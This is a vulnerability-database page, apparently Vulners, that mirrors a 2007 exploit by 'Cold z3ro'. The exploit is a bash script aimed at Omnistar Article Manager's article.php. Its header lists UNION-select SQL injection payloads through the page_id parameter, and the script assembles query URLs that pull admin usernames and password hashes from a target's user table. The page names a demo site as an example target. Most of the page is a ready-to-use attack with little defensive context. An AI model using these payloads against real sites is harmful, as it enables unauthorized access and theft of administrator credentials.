Lucene search

Omnistar Article Manager Software (article.php) SQL Injection Exploit

🗓️ 16 Sep 2007 00:00:00Reported by Cold ZeroType

zdt🔗 0day.today👁 14 Views

Omnistar Article Manager Software SQL Injection Exploi

=====================================================================
Omnistar Article Manager Software (article.php) SQL Injection Exploit
=====================================================================



#/bin/bash



####################################################################################################################

#                                                                                                                  #

#                 Omnistar Article Manager Software (article.php) Remote SQL Injection Exploit                     #

#                                                                                                                  #

#                                       Exploit Coded By : Cold z3ro                                               #

#                                                                                                                  #

#                                            http://Hackteach.org                                                  #

#                                                                                                                  #

#                                                                                                                  #

# Exploit : /article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/name,1/**/from/**/user/*       #

#           /article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/password,1/**/from/**/user/*   #

#                                                                                                                  #

# Example : http://demo.hostcontroladmin.com/demo_press2/articles/                                                 #

#                                                                                                                  #

####################################################################################################################



URL=$1;

PATH="$2/";



echo -e "\n";

echo -e "\n";

echo -e "######################################################################################"

echo -e "#   Omnistar Article Manager Software (article.php) Remote SQL Injection Exploit     #"

echo -e "#                           Exploit Coded By By : Cold z3ro                          #"

echo -e "#                                 http://Hackteach.org                               #"

echo -e "######################################################################################"



if [ "$URL" = "" ]; then

	echo -e "\n USAGE: $0 [URL] [NukePath]"

	echo -e " Example: $0 www.victim.net NukePath\n" 

	exit

fi;



if [ $PATH = "/" ]; then PATH=""; fi;



name_query_url="http://$URL/$PATH""article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/name,1/**/from/**/user/*";



password_query_url="http://$URL/$PATH""article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/password,1/**/from/**/user/*";



echo -e "\n";

echo -e "\n";

echo -e "Direct Query URL For Admin name: \n";

echo -e ""$name_query_url"\n";

echo -e "\n";

echo -e "Direct Query URL For Admin Hash:\n";

echo -e ""$password_query_url"\n";



#  0day.today [2018-03-06]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

16 Sep 2007 00:00Current

7.1High risk

Vulners AI Score7.1